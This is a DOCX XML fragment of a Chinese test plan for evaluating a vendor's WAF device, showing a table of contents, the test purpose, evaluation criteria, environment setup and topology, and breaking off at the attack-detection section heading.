            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="5C1B20C1">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
              <w:tab w:val="clear" w:pos="1260"/>
              <w:tab w:val="clear" w:pos="9498"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1956697264 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">5.21 </w:t>
          </w:r>
          <w:r>
            <w:t>Request</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1956697264 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>33</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="0B84D2F2">
          <w:pPr>
            <w:pStyle w:val="18"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
              <w:tab w:val="clear" w:pos="567"/>
              <w:tab w:val="clear" w:pos="9214"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1793829537 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>附录 A 致谢</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1793829537 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>35</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="57D20787">
          <w:pPr>
            <w:spacing w:after="163" w:line="260" w:lineRule="exact"/>
            <w:ind w:firstLine="420"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2F77AAE6">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE3FFC4">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D7BD3E">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83F8D1">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>表格索引</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC3C6C">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "表" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>错误！未找到图形项目表。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4406E5DB">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57ACEE9B">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204A874D">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66356A64">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3F5ADE">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B8DB6A3">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A469B3">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C77D3BD">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C02E017">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055B9173">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E79A02">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640BFF2A">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B48D031">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7367AAC9">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0FC9B1">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B98210">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BF75E9">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061B13CF">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D3AD77">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB280B8">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51010AE1">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300B3321">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B54737">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D79D4BC">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E2FC46">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF4EA50">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CDD396">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503AD0C5">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B680702">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A6BB30">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796C5FDF">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsia="等线 Light"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:id w:val="706063762"/>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="3370BC86">
          <w:pPr>
            <w:pStyle w:val="2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
            <w:spacing w:before="100" w:beforeAutospacing="1" w:afterLines="0" w:afterAutospacing="1"/>
            <w:ind w:left="440"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:bookmarkStart w:id="2" w:name="_Toc81916049"/>
          <w:bookmarkEnd w:id="2"/>
        </w:p>
        <w:p w14:paraId="1A2FD84F">
          <w:pPr>
            <w:spacing w:before="100" w:beforeAutospacing="1" w:after="163" w:afterAutospacing="1"/>
            <w:ind w:firstLine="420"/>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="388A0BC4">
      <w:pPr>
        <w:spacing w:after="163" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F23978">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="326"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc81916050"/>
      <w:bookmarkStart w:id="4" w:name="_Toc21077777"/>
      <w:bookmarkStart w:id="5" w:name="_Toc52954766"/>
      <w:r>
        <w:t>概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="41936D36">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc21077778"/>
      <w:bookmarkStart w:id="7" w:name="_Toc81916051"/>
      <w:bookmarkStart w:id="8" w:name="_Toc952522304"/>
      <w:r>
        <w:t>测试目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4FD1886F">
      <w:pPr>
        <w:pStyle w:val="89"/>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>按照测试方案要求，对厂商提供的WAF设备进行可行性测试，以明确WAF设备功能的可实现性，为WAF设备的选型提供测试依据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346BDFAB">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc81916052"/>
      <w:bookmarkStart w:id="10" w:name="_Toc21077779"/>
      <w:bookmarkStart w:id="11" w:name="_Toc1699258590"/>
      <w:r>
        <w:t>测试要求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="297078B1">
      <w:pPr>
        <w:pStyle w:val="89"/>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>测试结果必须提供截图作为辅助证明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD2E269">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc21077780"/>
      <w:bookmarkStart w:id="13" w:name="_Toc81916053"/>
      <w:bookmarkStart w:id="14" w:name="_Toc54100677"/>
      <w:r>
        <w:t>评判标准</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="6744B441">
      <w:pPr>
        <w:pStyle w:val="89"/>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>在测试方案的“测试结果”一栏中填入“通过”、“部分通过”、“未通过”、“未测试”、“无此功能”或者性能指标值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C400D9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc21077781"/>
      <w:bookmarkStart w:id="16" w:name="_Toc81916054"/>
      <w:bookmarkStart w:id="17" w:name="_Toc884495658"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="67615980">
      <w:pPr>
        <w:pStyle w:val="89"/>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在以下测试用例中，防护站点均采用</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.site.com" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>ww.site.com</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为例进行说明，测试时需替换为真实的防护站点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB36715">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29865377">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="326"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc21077782"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="_Toc81916055"/>
      <w:bookmarkStart w:id="20" w:name="_Toc836719472"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境准备</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="213CD6F9">
      <w:pPr>
        <w:pStyle w:val="89"/>
        <w:spacing w:after="163" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="438" w:firstLineChars="209"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一台硬件雷池设备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360FC0A9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="326"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="21" w:name="_Toc81916056"/>
      <w:bookmarkStart w:id="22" w:name="_Toc1021245348"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络拓扑</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="155EE1B3">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5727700" cy="28765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727700" cy="2876550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF423B3">
      <w:pPr>
        <w:spacing w:after="163" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A4824">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="326"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc21077789"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="24" w:name="_Toc81916092"/>
      <w:bookmarkStart w:id="25" w:name="_Toc1381257012"/>
      <w:r>
        <w:t>WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击检测功</w:t>
      </w:r>
      <w:r>
        <w:t>能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="6C7E7D2B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc21077790"/>
      <w:bookmarkStart w:id="27" w:name="_Toc81916093"/>
      <w:bookmarkStart w:id="28" w:name="_Toc488376614"/>
      <w:r>
        <w:rPr>
